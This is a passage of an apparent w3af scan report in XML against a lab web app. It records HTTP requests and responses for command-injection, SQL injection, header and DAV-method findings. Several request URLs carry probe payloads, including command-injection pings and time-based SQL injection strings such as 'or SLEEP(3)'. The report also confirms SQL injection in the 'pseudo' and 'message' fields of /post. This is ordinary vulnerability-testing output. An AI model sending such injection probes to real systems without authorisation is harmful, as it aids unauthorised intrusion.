                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="952">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="961">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="968">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="977">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="984">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="993">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1000">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1009">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1015">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <information id="[16]" name="Strange header" plugin="strange_headers" url="http://192.168.0.116:31337/">
        <description>The remote web server sent the HTTP header: &quot;host&quot; with value: &quot;192.168.0.116:31337&quot;, which is quite uncommon and requires manual analysis. This information was found in the request with id 16.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="16">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[80]" name="Omitted server header" plugin="server_header" url="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response. This information was found in the request with id 80.</description>
        <http-transactions>
            <http-transaction id="80">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="80">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[90]" name="Powered-by header" plugin="server_header" url="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;. This information was found in the request with id 90.</description>
        <http-transactions>
            <http-transaction id="90">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="90">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[627]" name="SQL injection" plugin="sqli" url="http://192.168.0.116:31337/post">
        <description>SQL injection in a MySQL database was found at: &quot;http://192.168.0.116:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=Hello%20World&amp;pseudo=a%27b%22c%27d%22&quot; which modifies the &quot;pseudo&quot; parameter. This vulnerability was found in the request with id 627.</description>
        <http-transactions>
            <http-transaction id="627">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="45" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1hJTI3YiUyMmMlMjdkJTIy
</body>
                </httprequest>
                <httpresponse id="627">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;', 'Hello World')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[629]" name="SQL injection" plugin="sqli" url="http://192.168.0.116:31337/post">
        <description>SQL injection in a MySQL database was found at: &quot;http://192.168.0.116:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=a%27b%22c%27d%22&amp;pseudo=56&quot; which modifies the &quot;message&quot; parameter. This vulnerability was found in the request with id 629.</description>
        <http-transactions>
            <http-transaction id="629">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="34" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1hJTI3YiUyMmMlMjdkJTIyJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="629">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[36, 100, 125, 151, 255, 285, 312, 381, 428, 465, 481, 511, 561, 574, 597, 707, 731, 757, 779, 843, 853, 862, 880, 906, 922]" name="DAV methods enabled" plugin="allowed_methods" url="http://192.168.0.116:31337/">
        <description>The URL &quot;http://192.168.0.116:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE. This information was found in the requests with ids 36, 100, 125, 151, 255, 285, 312, 381, 428, 465, 481, 511, 561, 574, 597, 707, 731, 757, 779, 843, 853, 862, 880, 906 and 922.</description>
        <http-transactions>
            <http-transaction id="36">
                <httprequest>
                    <status>OPTIONS http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="36">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="100">
                <httprequest>
                    <status>MKCOL http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="100">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="125">
                <httprequest>
                    <status>MOVE http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="125">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="151">
                <httprequest>
                    <status>HEAD http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="151">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </httpresponse>
            </http-transaction>
            <http-transaction id="255">
                <httprequest>
                    <status>REPORT http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="255">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>NOTIFY http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="285">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="312">
                <httprequest>
                    <status>OPTIONS http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="312">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
